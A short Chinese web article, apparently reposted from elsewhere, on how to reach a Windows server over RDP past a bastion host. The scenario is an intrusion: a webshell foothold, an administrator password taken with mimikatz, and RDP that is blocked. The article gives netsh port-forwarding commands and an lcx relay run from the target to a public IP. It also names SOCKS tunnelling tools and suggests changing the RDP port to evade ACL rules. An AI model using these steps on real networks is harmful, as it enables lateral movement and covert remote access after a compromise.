如何绕过堡垒机远途登录
发布时间:2022-07-29 09:47:12 所属栏目:安全 来源:互联网
导读:假设一个场景:在Webshell中执行mimikatz获取到win管理员密码,并且本地查看端口3389是开放的,可是从当前跳板机无法远程到目标机器。因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办? 1、使用netsh命令进行端口转发 Windows自带的netshnets
|
假设一个场景:在Webshell中执行mimikatz获取到win管理员密码,并且本地查看端口3389是开放的,可是从当前跳板机无法远程到目标机器。因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办? 1、使用netsh命令进行端口转发 Windows自带的netshnetsh实现端口转发,监听12345端口,转发到本地3389端口,可绕过访问策略限制。 复制 #A、3389端口转发到12345端口 netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389 #B、查看配置好的端口映射清单 C:Windowssystem32>netsh interface portproxy show v4tov4 侦听 ipv4: 连接到 ipv4: 地址 端口 地址 端口 --------------- ---------- --------------- ---------- 192.168.126.32 12345 192.168.126.32 3389 2、LCX 端口转发 在目标机器上执行:lcx.exe -slave 公网ip 51 内网ip 3389 在公网的机器执行:Lcx.exe –listen 51 3340 本地机器上连接 127.0.0.1:3340,即可连接上目标机器的3389。 3、内网穿透工具 SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等 通过利用SOCKS协议,结合Proxifier使用,可实现mstsc登录目标主机。 4、修改Windows远程桌面端口 通过修改Windows默认远程桌面端口,从而绕过ACL策略访问限制。 (编辑:开发网_开封站长网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |



浙公网安备 33038102330459号